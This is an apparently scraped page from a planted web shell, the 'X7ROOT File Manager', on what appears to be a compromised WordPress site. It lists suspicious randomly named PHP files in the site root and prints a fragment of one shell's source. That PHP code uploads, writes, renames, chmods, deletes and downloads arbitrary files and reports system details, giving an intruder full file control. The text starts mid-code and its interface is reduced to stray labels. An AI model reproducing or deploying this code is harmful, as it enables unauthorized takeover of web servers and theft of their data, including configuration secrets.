/home/vianto5/cititower.mx
NameSizeModeActions
.render-cache/-0755rm
.well-known/-0755rm
amenidades/-0755rm
en/-0755rm
plantas/-0755rm
renta-de-locales/-0755rm
rental-of-premises/-0755rm
ubicacion/-0755rm
video/-0755rm
well-known/-0755rm
wp-admin/-0755rm
wp-content/-0755rm
wp-includes/-0755rm
.htaccess2810644editdlrm
.htaccess_bk20470644editdlrm
bdgpmtyd.php362540644editdlrm
bmugpupt.php127840644editdlrm
ejegwyfo.php73170644editdlrm
google5e5e533239bf5365.html530644editdlrm
index.php19460644editdlrm
index.php.nox-bak4050644editdlrm
license.txt199030644editdlrm
php.ini1050644editdlrm
readme.d479f915d5e57d1ad39e10289cf269e1.html74250644editdlrm
readme.php970100644editdlrm
wp-activate.php73490644editdlrm
wp-blog-header.php3510644editdlrm
wp-comments-post-loader.php15050644editdlrm
wp-comments-post.php23230644editdlrm
wp-config.php33410600editdlrm
wp-cron-warj.php16590644editdlrm
wp-cron.php56170644editdlrm
wp-links-opml.php24930644editdlrm
wp-load.php39370644editdlrm
wp-login.php514590644editdlrm
wp-mail.php87270644editdlrm
wp-settings.php310550644editdlrm
wp-signup.php346500644editdlrm
wp-trackback.php52140644editdlrm
xmlrpc.php32050644editdlrm
yicvajoa.php195130644editdlrm
yvzciafo.php105600644editdlrm
zsugsmph.php210270644editdlrm
Edit: /home/vianto5/cititower.mx/zsugsmph.php (21027B)
✓ Uploaded' : '✗ Upload failed'; } // New if(isset($_POST['new'])) { $path = $currentPath . $_POST['new']; if(isset($_POST['type']) && $_POST['type'] === 'dir') { $message = @mkdir($path) ? '✓ Folder created' : '✗ Failed'; } else { $message = writeFile($path, $_POST['content'] ?? '') ? '✓ File created' : '✗ Failed'; } } // Save if(isset($_POST['save']) && isset($_POST['data'])) { $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ? '✓ Saved' : '✗ Save failed'; } // Rename if(isset($_POST['oldname']) && isset($_POST['newname'])) { $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ? '✓ Renamed' : '✗ Failed'; } // Chmod if(isset($_POST['chmod_item']) && isset($_POST['chmod_value'])) { $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ? '✓ Permissions changed' : '✗ Failed'; } } // GET actions if(isset($_GET['action'])) { $item = $_GET['item'] ?? ''; $itemPath = $currentPath . $item; if($_GET['action'] === 'delete') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? '✓ Deleted' : '✗ Failed'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? '✓ Deleted' : '✗ Failed'; } } elseif($_GET['action'] === 'download' && @is_file($itemPath)) { @ob_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($itemPath).'"'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), ['.', '..']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ 'PHP' => @phpversion(), 'OS' => @php_uname('s'), 'User' => @get_current_user() ]; ?> X7ROOT File Manager

X7ROOT File Manager

$value): ?> :
Root /
Close
Editing:
Cancel
Name Size Permissions Modified Actions
📂 Parent Directory
📁 -
Delete
📄 📄 -
Edit Download Delete
Empty directory